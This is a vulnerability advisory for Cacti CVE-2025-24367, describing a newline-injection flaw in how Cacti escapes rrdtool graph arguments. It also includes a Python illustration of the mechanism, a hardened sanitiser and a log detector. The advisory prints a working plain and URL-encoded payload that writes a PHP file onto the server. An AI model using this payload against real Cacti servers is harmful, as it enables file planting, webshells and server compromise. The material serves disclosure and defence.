Vulnerable Version
versions <= 1.2.28
Fixed Version
version 1.2.29
Base Score
8.7 (High)
Vendor Description:
Cacti is an open-source network monitoring and graphing program that aims to give a quick and efficient way to display time series data. It is commonly used to monitor network bandwidth, server performance, and other infrastructure metrics, using SNMP (Simple Network Management Protocol) and RRDtool (Round-Robin Database Tool) to collect, store, and display data in graph form. Cacti provides a web-based interface that allows users to generate custom graphs, specify data collection intervals, and easily manage devices and templates. Because of its flexibility and plugin support, it is a popular choice for both small and large enterprise systems.
CVE-2025-24367 Description:
Cacti uses the rrdtool binary to produce graphs/images based on Round Robin Databases (RRDs). A variety of switches can be configured for the binary via the web UI, notably inside the graph template or graph generation capabilities.
Cacti aims to sanitise potentially tainted user input by escaping shell metacharacters. For instance, in the function rrd_function_process_graph_options() in lib/rrd.php:
    case 'right_axis_label':
        if (!empty($value)) {
            $graph_opts .= '--right-axis-label ' . cacti_escapeshellarg($value) . RRD_NL;
        }
In lib/functions.php:
    /**
     * mimics escapeshellarg, even for windows
     *
     * @param $string - the string to be escaped
     * @param $quote - true: do NOT remove quotes from result; false: do remove quotes
     *
     * @return string - the escaped [quoted|unquoted] string
     */
    function cacti_escapeshellarg(string $string, bool $quote = true): string {
        global $config;

        if ($string == '') {
            return $string;
        }

        /* we must use an apostrophe to escape community names under Unix in case the user uses
           characters that the shell might interpret. the ucd-snmp binaries on Windows flip out when
           you do this, but are perfectly happy with a quotation mark. */
        if ($config['cacti_server_os'] == 'unix') {
            /* escapeshellarg() single-quotes the value but leaves CR/LF characters intact */
            $string = escapeshellarg($string);

            if ($quote) {
                return $string;
            } else {
                # remove first and last char
                return substr($string, 1, (strlen($string) - 2));
            }
        }

        /* non-unix (Windows) branch not shown in this excerpt */
    }
However, the sanitisation logic neither escapes nor removes newline characters. Because rrdtool reads its commands line by line, an injected newline ends the current command and lets the remainder of the value be parsed as independent rrdtool commands, including calls to other capabilities such as RRD creation, restoration, dump, and so on.
Several different rrdtool functions can be called from a single payload by injecting multiple newlines. The payload below contains two separate commands: the first creates a new RRD database that is used by the second command (otherwise, the attacker would have to identify the path of an existing RRD file on the target system), and the second creates a CSV ‘graph’ of the data within the newly created my.rrd file and saves it as xxx2.php, with PHP code embedded within it:
    XXX
    create my.rrd --step 300 DS:temp:GAUGE:600:-273:5000 RRA:AVERAGE:0.5:1:1200
    graph xxx2.php -s now -a CSV DEF:out=my.rrd:temp:AVERAGE LINE1:out:<?=phpinfo();?>
Encoded payload (note the %0A-encoded newline characters that lead each injected command and terminate the payload):
    XXX%0Acreate+my.rrd+--step+300+DS%3Atemp%3AGAUGE%3A600%3A-273%3A5000+RRA%3AAVERAGE%3A0.5%3A1%3A1200%0Agraph+xxx2.php+-s+now+-a+CSV+DEF%3Aout%3Dmy.rrd%3Atemp%3AAVERAGE+LINE1%3Aout%3A%3C%3F%3Dphpinfo%28%29%3B%3F%3E%0A
Impact:
- Remote Command Injection: By exploiting unsanitised newline characters, attackers can inject and execute arbitrary rrdtool instructions from the Cacti web interface.
- Arbitrary File Creation: By abusing graph generation settings, attackers can create malicious files (e.g., .php scripts) on the target server, allowing for further exploitation such as webshell deployment.
- Privilege Escalation: If Cacti is running with elevated privileges (e.g., www-data or root), successful exploitation could result in greater control over the server environment.
- Bypassing Input Sanitisation: Despite the existing sanitisation via escapeshellarg, the failure to handle newline characters (\n) allows attackers to circumvent the input filter.
- System Compromise: Using injected commands, attackers may create or manipulate RRD files and even execute chained operations to exfiltrate data or pivot deeper into the system.
- Persistent Backdoor Risk: The ability to save crafted files such as xxx2.php containing PHP code (e.g., <?=phpinfo();?>) poses a long-term risk if undetected, enabling persistent access to the system.
Mitigations:
- Update Cacti Immediately: Upgrade to the latest patched version (1.2.29 or later) to eliminate the vulnerability.
- Sanitise Input Properly: Ensure all user input is filtered to remove newline (\n, %0A) and carriage return (\r, %0D) characters before it is passed to rrdtool.
- Restrict Write Permissions: Prevent the web server from writing to directories that could serve executable files (e.g., no .php write access in the web root).
- Limit Access to Graph Functions: Only allow trusted/admin users to configure graph templates or parameters.
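As an added illustration (not code from this advisory or from the Cacti project), the Python below reproduces the newline mechanism described above and the input check recommended under Mitigations: it mimics Unix escapeshellarg(), shows how the advisory's encoded payload splits into separate rrdtool command lines, rejects line terminators the way a hardened sanitiser should, and flags such values when reviewing logged graph parameters. The subcommand list, hardened_escape() and suspicious_graph_param() are assumptions of this example, not Cacti functions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample: the URL-encoded right_axis_label value quoted in the advisory above.
ENCODED_PAYLOAD = ("XXX%0Acreate+my.rrd+--step+300+DS%3Atemp%3AGAUGE%3A600%3A-273%3A5000"
                   "+RRA%3AAVERAGE%3A0.5%3A1%3A1200%0Agraph+xxx2.php+-s+now+-a+CSV"
                   "+DEF%3Aout%3Dmy.rrd%3Atemp%3AAVERAGE+LINE1%3Aout%3A%3C%3F%3Dphpinfo%28%29%3B%3F%3E%0A")
DECODED_PAYLOAD = unquote_plus(ENCODED_PAYLOAD)

# rrdtool subcommands an injected line may start with (assumed list: the ones the advisory
# names plus other standard ones); used by the detector below.
RRD_SUBCOMMANDS = {"create", "graph", "graphv", "dump", "restore", "update", "fetch", "xport", "tune"}

def unix_escapeshellarg(value: str) -> str:
    """Mimic PHP escapeshellarg() on Unix: single-quote the value and escape embedded quotes.
    CR and LF pass through untouched, which is the root cause described above."""
    return "'" + value.replace("'", "'\\''") + "'"

def rrdtool_command_lines(option: str, raw_value: str) -> list:
    """Build the option text the way lib/rrd.php does, then split it the way rrdtool's
    line-oriented command reader will: every line becomes its own rrdtool command."""
    text = option + " " + unix_escapeshellarg(raw_value)
    return [line for line in text.split("\n") if line]

def hardened_escape(value: str) -> str:
    """Illustrative hardening (assumed, not Cacti's actual patch): refuse any value carrying
    a line terminator before quoting, so it can never become a second rrdtool command."""
    if "\r" in value or "\n" in value:
        raise ValueError("line terminator in rrdtool argument")
    return unix_escapeshellarg(value)

def suspicious_graph_param(encoded: str) -> list:
    """Detection helper for access-log review (assumed name): percent-decode a graph
    parameter and return rrdtool subcommands found at the start of any injected line.
    Only lines after a CR/LF are examined, so a first-line label like 'graph of x' is ignored."""
    lines = re.split(r"[\r\n]+", unquote_plus(encoded))
    hits = []
    for line in lines[1:]:
        first_word = line.strip().split(" ", 1)[0].lower()
        if first_word in RRD_SUBCOMMANDS:
            hits.append(first_word)
    return hits

if __name__ == "__main__":
    for cmd in rrdtool_command_lines("--right-axis-label", DECODED_PAYLOAD):
        print(repr(cmd))
    print(suspicious_graph_param(ENCODED_PAYLOAD))  # ['create', 'graph']
```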
